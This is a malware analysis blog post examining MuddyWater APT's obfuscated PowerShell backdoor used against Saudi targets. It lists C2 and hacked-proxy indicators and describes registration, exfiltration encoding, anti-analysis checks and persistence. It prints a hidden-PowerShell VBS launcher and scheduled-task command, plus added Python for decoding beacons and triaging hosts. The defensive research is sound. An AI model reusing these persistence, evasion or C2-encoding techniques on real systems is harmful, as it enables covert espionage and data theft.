Summary

In September of 2017, the Saudi government was targeted in a cyber attack by means of a malicious PowerShell script deployed using a Microsoft Word macro. This attack gave MuddyWater Advanced Persistent Threat (APT) operators the ability to conduct cyber espionage operations against the Saudi government. The malicious script communicated through compromised websites, using the sites as proxies until finally reaching the command and control servers. Recently, experts at the Saudi National Cyber Security Centre (NCSC) published an alert regarding a second MuddyWater APT attack. This incident had subtle differences from the previous attack: a malicious Microsoft Word document spawning PowerShell scripts, spotted during a spear phishing campaign targeting Saudi Arabia. The scope of this attack is not clear; however, the DarkMatter Malware Research Lab noticed that a couple of Saudi and UAE websites were hacked and then used as proxies supporting this attack. This APT attack is more stealthy and evasive than the one from September, rendering it more successful. This blog post will highlight the differences between this and the earlier attack, and we will share the new Tactics, Techniques and Procedures (TTPs) used by MuddyWater APT to effectively evade the security measures in place. MuddyWater APT is a copycat threat actor relying on known and publicly available tools and scripts, using little custom code, and initially stealing little information from the infected systems (e.g., OS information, hostname, username and IP). The script beacons in a generic way through randomly selected legitimate hacked websites used as proxies, with the ability to execute the operator's commands, making it a powerful and stealthy tool for exfiltration. The DarkMatter Malware Research Lab analysed this second attack, highlighting the latest refinements this APT actor has made since September.


Post on 28-Mar-2018


    https://www.moi.gov.sa/wps/portal/ncsc/home/Alerts/!ut/p/z0/TYzLCoJAFIZfpU1LOWe8pNtJ09BCIgI9m2EahpqSMVOsx09x0-bjv_EDQQVk5WhucjCtlc3ka9oIxpJo72Z4KMMiQb49ndPAyzx-RMiB_gdRGvvI86i44K70EHF-MI-uIw6kWjvo7wCVVb1qzHWNs5ioP_3ClXyruxn10og5Eixw0HdcZKEU2sLrSfU

Technical Analysis:

Samples analysed:

    sha256                                                            filename
    74990a1d4f25c6b6b3edc937c5a2cd349a3f540eb66d40ee189b51e333ade77b  system.ps1
    5a3506a12a4d8d99648e58661f2306ec091d4890cb21900b50694d5487212de2  system.ps1
    b2c10621c9c901f0f692cae0306baa840105231f35e6ec36e41b88eebd46df4c  system.ps1

    Found using one of our experimental YARA rules:

    One of the first differences noted from the September version is that the PowerShell script comes heavily obfuscated using invoke-obfuscation, a PowerShell Obfuscator framework. The code snippet below shows the obfuscated form of this script:

    Heavily obfuscated PowerShell script code snippet

The attackers used a token-level obfuscation that persists all the way through to the ScriptBlock level in the Windows event log. This approach guaranteed an effective AV bypass on the target systems, and is therefore effective against most signature-based AVs scanning through the Windows 10 AMSI. Below is an event captured from this script's execution on Windows 10, showing the persisted token-level obfuscation:

DarkMatter was able to statically de-obfuscate the whole script. The most notable differences in this new version are:

    o Usage of the invoke-obfuscation framework
    o Dropped from the macro directly
    o No more downloads from file sharing websites like Pastebin, Filebin or GitHub
    o Different URL parameters and callback encoding
    o Different code structure
    o Different user ID format
    o Usage of anti-analysis checks
    o New proxy list

Configuration data

This script has its configuration data embedded, and as with the code, the configuration data is protected with the aforementioned obfuscation. The configuration data contains the following, respectively:

    o A variable {IP} representing the C2 IP address and port: http://148.251.204[.]131:8060
    o A variable {ID} set to null; this variable will receive the unique ID key identifying a victim
    o A variable {CS} set to 1024, representing the size of the data chunks sent to the C2
    o A variable {m} set to "bmxDJY+=", used to obfuscate network traffic
    o A variable {r} set to "@*$()|[_", used to obfuscate network traffic
    o A variable {k} set to BitDifender, the name of a registry key storing the proxy URLs
    o A variable {s_path} pointing to the persistence directory, here set to C:\Users\Public\Documents
    o A variable {TSK} having its value set to the path of a VBS script: C:\Users\Public\Documents\system.vbs


    o Finally, a variable {Proxy} containing a list of hacked websites, used by this malware as proxies (full list attached in the appendix):

        o http://diplomat[.]com[.]sa/wp-content/plugins/wordpress-importer/cache[.]php?c=
        o https://www[.]spearhead-training[.]com/work[.]php?c=
        o https://www[.]spearhead-training[.]com//html/power[.]php?c=
        o http://watyanagr[.]nfe[.]go[.]th/e-office/lib/work[.]php?c=
        o ...

The main routine:

The main function differs from the previous version: this later version runs the anti-analysis stub isdeugenv at the beginning of execution and again before every newly received C2 command is executed. Below is the de-obfuscated function:

Main routine

Once the script makes sure it isn't running in an analysis environment, it stores the proxy list in a registry key named BitDifender under HKLM\Software and HKCU\Software:

Registry key storing proxy list

The script then calls the getkey function and waits indefinitely until a file named current_user.dat is created in the configured persistence directory, here %Public%\Documents, effectively making this an anti-sandbox trick if the sample is analysed offline. The getkey function calls the register function (see below) to register the new victim and obtain the unique ID from the server. This identifier (supposedly unique per victim) is 32 characters long, and its value is matched on every read and write against the following regular expression: ^[a-f0-9]{32}$. Once this ID is retrieved, it is validated with the above regex and then stored in the .dat file. From then on, this ID is sent in every C2 transaction, helping the C2 identify the victims. Below is a victim ID example: a=g&b=9e97c5bd9d39f2f4a59c0506141dfc9f

Finally, if the .dat file is created, it means the PowerShell script successfully registered the victim; the script then enters an infinite loop waiting for C2 commands to execute.

Beaconing, C2 registration, data exfiltration:

This script differs from the previous version, with the registration process handled by the function called register, seen below:

Register function

This function registers the victim and retrieves an ID from the C2 server. The registration carries stolen information, extracted using WMI queries. Below is the information sent to the C2 when the victim first registers:

    o Computer name
    o Username
    o Operating system architecture, name and version, and path to %systemroot%
    o Current IP address

Example of information stolen from a Windows 7 32-bit machine: a=r&b=6InmkFj5Is~~BObxfI0~~32-bit|6.1.7601|Microsoft Windows 7 Home Premium |C:\Windows~~192.168.56.23

    Stolen info from target machine

This information is sent encoded using the following custom algorithm:

    o Base64-encode the string.
    o Byte swapping: replace each character present in column "in" with its equivalent in column "out" (these are exactly the characters of the configuration variables {m} and {r}):

    in   out
    b    @
    m    *
    x    $
    D    (
    J    )
    Y    |
    +    [
    =    _

    Giving it the following final form:

Below, a quick re-implementation of the decoding algorithm in Python 2.x:

    Python decoding function

The proxy configuration is set up by choosing one proxy from the proxy list, randomly each time, which makes this PowerShell backdoor very effective and evasive on the network. Below is the de-obfuscated httpget function used to communicate through the proxies; the captured request shows the registration data above after the custom encoding:

    GET /?p=|T1y)*I9Nklu@WtGajV)c35[Qk9ieGZ)MH5[MzIt|*l0f(|uMS43NjA$fE1p|3)vc29*dCBXaW5k@3dzI(cgSG9tZSBQc*VtaXVtIH$(Ol$XaW5k@3dzfn4$OTIuMT|4LjU2LjIz HTTP/1.1

Httpget function

Note: if a proxy is chosen, the request is re-encoded a second time in base64. If no proxy can be used, the PowerShell script falls back to contacting the C2 server directly, encoding the data with the custom algorithm above.
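The decoding function in the original post survives here only as an image caption. What follows is an added Python 3 re-implementation written for this page (it is not DarkMatter's code) that covers both the custom encoding algorithm above and the httpget behaviour: it encodes and decodes the a=/b= beacon, strips the extra base64 layer a proxied request carries, and splits the registration data into its fields. The captured GET request above is used as the sample input (with a line-wrap space removed); the field names returned by parse_beacon are this example's own.

```python
import base64
import re

# Swap table from the write-up: column "in" -> column "out". The keys are the
# characters of the {m} configuration value and the values those of {r}.
SWAP_OUT = {"b": "@", "m": "*", "x": "$", "D": "(", "J": ")", "Y": "|", "+": "[", "=": "_"}
SWAP_IN = {out: inp for inp, out in SWAP_OUT.items()}

# Victim ID format the script enforces on every read and write of current_user.dat.
VICTIM_ID_RE = re.compile(r"^[a-f0-9]{32}$")

# The p= parameter of the captured request shown in the write-up (space removed).
SAMPLE_GET_P = (
    "|T1y)*I9Nklu@WtGajV)c35[Qk9ieGZ)MH5[MzIt|*l0f(|uMS43NjA$fE1p|3)vc29*dCBXaW5k"
    "@3dzI(cgSG9tZSBQc*VtaXVtIH$(Ol$XaW5k@3dzfn4$OTIuMT|4LjU2LjIz"
)


def encode_payload(plaintext: str) -> str:
    """Base64-encode the string, then swap the eight characters as the script does."""
    b64 = base64.b64encode(plaintext.encode("utf-8")).decode("ascii")
    return "".join(SWAP_OUT.get(ch, ch) for ch in b64)


def encode_for_proxy(encoded: str) -> str:
    """Outer layer added when the beacon goes through a proxy: plain base64 again."""
    return base64.b64encode(encoded.encode("ascii")).decode("ascii")


def decode_payload(value: str, via_proxy: bool = False) -> str:
    """Reverse the encoding; via_proxy=True strips the extra base64 layer first."""
    if via_proxy:
        value = base64.b64decode(value).decode("ascii")
    b64 = "".join(SWAP_IN.get(ch, ch) for ch in value)
    return base64.b64decode(b64).decode("utf-8", errors="replace")


def parse_beacon(plaintext: str) -> dict:
    """Split 'a=<type>&b=<data>'. Registration ('r') data is '~~'-separated:
    computer name, user name, OS details (themselves '|'-separated), IP.
    A 'g' message carries the 32-hex-character victim ID."""
    params = dict(kv.split("=", 1) for kv in plaintext.split("&") if "=" in kv)
    result = {"type": params.get("a"), "data": params.get("b", "")}
    if result["type"] == "r":
        fields = result["data"].split("~~")
        if len(fields) == 4:
            arch, version, name, systemroot = (fields[2].split("|") + [""] * 4)[:4]
            result.update(
                computer=fields[0],
                user=fields[1],
                os={"arch": arch, "version": version, "name": name, "systemroot": systemroot},
                ip=fields[3],
            )
    elif result["type"] == "g":
        result["victim_id_valid"] = VICTIM_ID_RE.match(result["data"]) is not None
    return result


if __name__ == "__main__":
    plain = decode_payload(SAMPLE_GET_P)
    print(plain)
    print(parse_beacon(plain))
    print(parse_beacon("a=g&b=9e97c5bd9d39f2f4a59c0506141dfc9f"))
```

Decoding the captured request yields exactly the registration string shown for the Windows 7 machine, which confirms the swap table and the field order given above; a proxied beacon differs only in the outer base64 layer, so the same decoder applies once that layer is removed.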

Executing C2 commands:

Similar to the previous attack, this backdoor executes C2 commands and returns the results encoded. The URL parameters as well as the command separators were modified in this version; below is the de-obfuscated code of the getCommand function:

getCommand function

The command results are sent via a function named sendResult, using different URL parameters from the previous version and sending 1024-byte chunks at a time (the {CS} configuration value). Below is the function fully de-obfuscated:

sendResult function

The operators have the ability to update the PowerShell script through this command execution mechanism. The updates seen so far are the following:

    o Updates to the proxy list and/or C2 server
    o Updates to the anti-analysis function

Of course, the operators also have the ability to update the whole PowerShell script at any time. Finally, DarkMatter observed instances where operators had the ability to inject Meterpreter into the infected system's memory, using PowerShell reflection payloads, giving them limitless power over the targets.

Persistence Mechanism:

A Run key value named Windows Optimizations is created in both:

    HKLM:SOFTWARE{0}Microsoft{0}Windows{0}CurrentVersion{0}Run
    HKCU:SOFTWARE{0}Microsoft{0}Windows{0}CurrentVersion{0}Run

(the {0} placeholders are filled in at run time, resolving to the standard Run keys). The value's content is wscript followed by the VBS file path, here:

    C:\Users\Public\Documents\system.vbs

As with the previous variant, this script is basically a launcher for the malicious PowerShell script present in the persistence directory:

    Set objShell = WScript.CreateObject("WScript.Shell")
    command = "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -file C:\Users\Public\Documents\system.ps1"
    objShell.Run command,0
    Set objShell = Nothing

Both system.ps1 and system.vbs are stored as hidden system files on disk in the persistence directory. Finally, a task is added to the Task Scheduler running the launcher on every log-on:

    schtasks.exe /Create /RU system /SC ONLOGON /TN Microsoft\WindowsOptimizationsService /TR "wscript %PUBLIC%\Documents\system.vbs" /F
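Added example, not part of the original analysis: a Python 3 triage helper that checks the persistence artifacts described above (the Windows Optimizations Run value, the WindowsOptimizationsService scheduled task, the BitDifender registry key, and launcher paths under Public\Documents) against data exported from a host. The input formats and sample records are constructed for this page: the task CSV is a trimmed schtasks /Query /FO CSV /V export keeping only the TaskName and "Task To Run" columns, and the registry values are given as already-collected tuples, since reading the registry is not the point here.

```python
import csv
import io
import re

# Indicators taken from the persistence and main-routine sections of the write-up.
RUN_VALUE_NAME = "Windows Optimizations"
TASK_NAME = r"\Microsoft\WindowsOptimizationsService"
PROXY_KEY_NAME = "BitDifender"  # registry key under HKLM\Software / HKCU\Software

# Launcher or script dropped in the persistence directory, in either spelling
# the write-up uses (%PUBLIC%\Documents or C:\Users\Public\Documents).
PERSIST_DIR_RE = re.compile(
    r"(?i)(?:%public%|c:\\users\\public)\\documents\\system\.(?:vbs|ps1)"
)


def triage_run_values(run_values):
    """run_values: iterable of (key_path, value_name, data) collected from the Run keys.
    Flags the named value or any value whose data points into the persistence directory."""
    findings = []
    for key_path, name, data in run_values:
        if name.lower() == RUN_VALUE_NAME.lower() or PERSIST_DIR_RE.search(data):
            findings.append(f"Run value '{name}' in {key_path} -> {data}")
    return findings


def triage_tasks(tasks_csv):
    """tasks_csv: text shaped like `schtasks /Query /FO CSV /V` with at least the
    'TaskName' and 'Task To Run' columns. Flags the task name or launcher path."""
    findings = []
    for row in csv.DictReader(io.StringIO(tasks_csv)):
        name = row.get("TaskName", "")
        action = row.get("Task To Run", "")
        if name.lower() == TASK_NAME.lower() or PERSIST_DIR_RE.search(action):
            findings.append(f"Scheduled task '{name}' -> {action}")
    return findings


def triage_software_keys(subkeys):
    """subkeys: iterable of (hive, subkey_name) enumerated under <hive>\\Software."""
    return [
        f"{hive}\\Software\\{sub}"
        for hive, sub in subkeys
        if sub.lower() == PROXY_KEY_NAME.lower()
    ]


# Constructed sample data (not taken from a real host): one benign entry per source
# next to one entry matching the artifacts described in the write-up.
SAMPLE_RUN_VALUES = [
    (r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
     r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"),
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Windows Optimizations",
     r"wscript C:\Users\Public\Documents\system.vbs"),
]
SAMPLE_TASKS_CSV = (
    '"TaskName","Task To Run"\r\n'
    '"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","%windir%\\system32\\defrag.exe -c -h -o -$"\r\n'
    '"\\Microsoft\\WindowsOptimizationsService","wscript %PUBLIC%\\Documents\\system.vbs"\r\n'
)
SAMPLE_SOFTWARE_SUBKEYS = [("HKLM", "Microsoft"), ("HKCU", "BitDifender")]


def triage_all():
    """Run all three checks over the constructed samples and return the findings."""
    return (
        triage_run_values(SAMPLE_RUN_VALUES)
        + triage_tasks(SAMPLE_TASKS_CSV)
        + triage_software_keys(SAMPLE_SOFTWARE_SUBKEYS)
    )


if __name__ == "__main__":
    for finding in triage_all():
        print(finding)
```

The path check is deliberately broader than the two exact names, because the post notes the operators push updated scripts quickly after public disclosure; a hit on any wscript or PowerShell launcher under Public\Documents is worth a look even if the task and value names have changed.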

Anti-analysis:

The script runs an anti-analysis stub, isdeugenv, checking whether the process listing matches any of the common tools used by malware analysts. The stub runs the PowerShell ps command and compares the resulting list of running processes with the following list, calling exit if a match is found:

    Ollydbg, ProcessHacker, tcpview, autoruns, autorunsc, filemon, procmon, regmon, procexp, idaq, idaq64, ImmunityDebugger, Wireshark, dumpcap, HookExplorerkhP, ImportREC, PETools, LordPE, dumpcap, SysInspector, proc_analyzer, sysAnalkhPyzer, sniff_hit, windbg, joeboxcontrol, joeboxserver, win32_remote, win64_remote64

Conclusion

The attackers left a message in the script saying "panda was here :)". This message is printed if the registry key BitDifender already exists during the installation process. The message means the machine is already infected, and it leaves us with the only signature specific to this APT actor:

As seen before in numerous targeted attacks, the use of PowerShell has become mainstream. It provides attackers with ease of use and gives them interfaces and bindings to many Windows OS components while running fully in memory. If used correctly, a PowerShell attack can be stealthy and undetectable. Frameworks like invoke-obfuscation will only raise the bar temporarily for security vendors until they catch up. Seeing it used by attackers isn't really surprising, especially when dealing with copycat actors.

The real difficulty with these attacks becomes attribution. Indeed, copycat actors imitate other attackers by relying on open source tools, and won't give away any hint pointing to them directly, allowing them to hide in plain sight. But in the case of MuddyWater APT things are different. Despite having similarities with copycat actors, the operators have used the same open source tools since February with very few modifications. They target the same government entities, and respond effectively and quickly to any public release disclosing their TTPs by sending an updated version of their scripts to the targets. Copycat actors usually have a good level of operational security. MuddyWater APT does not, and its operators made a couple of mistakes that helped track them.

DarkMatter urges customers to activate logging, specifically PowerShell ScriptBlock logging. This mode logs scripts as they are executed, which can eventually strip away several layers of obfuscation. Invoke-obfuscation's output still persists at the ScriptBlock level, but it leaves traces of its usage: signs of suspicious activity that can be interpreted by careful analysts. It's important to mention that advanced attackers can surgically edit Windows event logs, and one solution is to stream the logs in real time to a SIEM solution. This procedure can help incident responders discover inconsistencies by the time attackers undertake a log modification. The remote SIEM server should be trusted, with a minimal attack surface, and locked down.

Appendix

Proxy list:

    http://www[.]4seasonrentacar[.]com/viewsure/data[.]aspx?c=
    http://www[.]vanessajackson[.]co[.]uk/work[.]php?c=
    https://www[.]spearhead-training[.]com/work[.]php?c=
    http://www[.]nigelwhitfield[.]com/v2/work[.]php?c=
    https://www[.]spearhead-training[.]com//html/power[.]php?c=
    http://www[.]elev8tor[.]com/show-work[.]php?c=
    http://watyanagr[.]nfe[.]go[.]th/e-office/lib/work[.]php?c=
    http://mainandstrand[.]com/work[.]php?c=
    http://watyanagr[.]nfe[.]go[.]th/watyanagr/power[.]php?c=
    http://www[.]jdarchs[.]com/work[.]php?c=
    http://www[.]akhtaredanesh[.]com/d/file/sym/work[.]php?c=
    http://106[.]187[.]38[.]21/short_qr/work[.]php?c=
    http://www[.]akhtaredanesh[.]com/d/oschool/power[.]php?c=
    http://www[.]arcadecreative[.]com/work[.]php?c=
    http://camco[.]com[.]pk/Controls/data[.]aspx?c=
    http://whiver[.]in/power[.]php?c=
    http://cgss[.]com[.]pk/data[.]aspx?c=
    http://feribschat[.]eu/logs[.]php?c=
    http://azmwn[.]suliparwarda[.]com/wp-content/plugins/wpdatatables/panda[.]php?c=
    http://www[.]armaholic[.]com/list[.]php?c=
    http://azmwn[.]suliparwarda[.]com/wp-content/themes/twentyfifteen/logs[.]php?c=
    http://www[.]eapa[.]org/asphalt[.]php?c=
    http://suliparwarda[.]com/wp-content/plugins/entry-views/work[.]php?c=
    http://www[.]shapingtomorrowsworld[.]org/category[.]php?c=
    http://suliparwarda[.]com/wp-content/themes/twentyfifteen/work[.]php?c=
    http://bangortalk[.]org[.]uk/speakers[.]php?c=
    https://wallpapercase[.]com/wp-includes/customize/logs[.]php?c=
    http://www[.]ridefox[.]com/content[.]php?c=
    https://wallpapercase[.]com/wp-content/themes/twentyfifteen/logs[.]php?c=
    https://coa[.]inducks[.]org/publication[.]php?c=
    http://www[.]yaran[.]co//wp-content/plugins/so-masonry/logs[.]php?c=
    http://www[.]dafc[.]co[.]uk/news[.]php?c=
    http://www[.]yaran[.]co/wp-includes/widgets/logs[.]php?c=
    https://mhtevents[.]com/account[.]php?c=
    http://www[.]asan-max[.]com/files/articles/css[.]aspx?c=
    http://best2[.]thebestconference[.]org/ccb/browse_cat[.]php?c=
    http://www[.]asan-max[.]com/files/articles/large/css[.]aspx?c=
    http://www[.]mitegen[.]com/mic_catalog[.]php?c=
    http://magical-energy[.]com/css/css[.]aspx?c=
    http://www[.]pomegranates[.]org/index[.]php?c=
    http://magical-energy[.]com/css[.]aspx?c=
    http://www[.]autotrans[.]hr/index[.]php?c=
    http://arbiogaz[.]com/upload/work[.]php?c=
    https://skepticalscience[.]com/graphics[.]php?c=
    http://ghanaconsulate[.]com[.]pk/data[.]aspx?c=
    http://tmclub[.]eu/clubdata[.]php?c=

    http://www[.]kunkrooann[.]com/inc/work[.]php?c=
    http://www[.]ztm[.]waw[.]pl/pop[.]php?c=
    http://school[.]suliparwarda[.]com/components/com_akeeba/work[.]php?c=
    http://www[.]mackellarscreenworks[.]com/work[.]php?c=
    http://school[.]suliparwarda[.]com/plugins/editors/codemirror/work[.]php?c=
    http://www[.]arcadecreative[.]com/work[.]php?c=
    http://diplomat[.]com[.]sa/wp-content/plugins/wordpress-importer/cache[.]php?c=
    https://www[.]spearhead-training[.]com/work[.]php?c=
    https://www[.]spearhead-training[.]com//html/power[.]php?c=
    http://watyanagr[.]nfe[.]go[.]th/e-office/lib/work[.]php?c=
    http://watyanagr[.]nfe[.]go[.]th/watyanagr/power[.]php?c=
    http://www[.]akhtaredanesh[.]com/d/file/sym/work[.]php?c=
    http://www[.]akhtaredanesh[.]com/d/oschool/power[.]php?c=
    http://cbpexbrasilia[.]com[.]br/wp-includes/widgets/work[.]php?c=
    http://cbpexbrasilia[.]com[.]br/wp-content/plugins/wordpress-seo/power[.]php?c=
    http://azmwn[.]suliparwarda[.]com/wp-content/plugins/wpdatatables/panda[.]php?c=
    http://azmwn[.]suliparwarda[.]com/wp-content/themes/twentyfifteen/logs[.]php?c=
    http://suliparwarda[.]com/includes/panda[.]php?c=
    http://suliparwarda[.]com/layouts/joomla/logs[.]php?c=
    https://wallpapercase[.]com/wp-includes/customize/logs[.]php?c=
    https://wallpapercase[.]com/wp-content/themes/twentyfifteen/logs[.]php?c=
    http://www[.]yaran[.]co//wp-content/plugins/so-masonry/logs[.]php?c=
    http://www[.]yaran[.]co/wp-includes/widgets/logs[.]php?c=
    http://www[.]asan-max[.]com/files/articles/css[.]aspx?c=
    http://www[.]asan-max[.]com/files/articles/large/css[.]aspx?c=
    http://magical-energy[.]com/css/css[.]aspx?c=
    http://magical-energy[.]com/css[.]aspx?c=
    http://riyadhfoods[.]com/css/edu[.]aspx?c=
    http://riyadhfoods[.]com/jquery-ui/js/jquery[.]aspx?c=
    http://www[.]kunkrooann[.]com/inc/work[.]php?c=

About the author

Taha Karim is Lead Security Researcher within DarkMatter's xen1thLabs. For additional information, email [email protected]

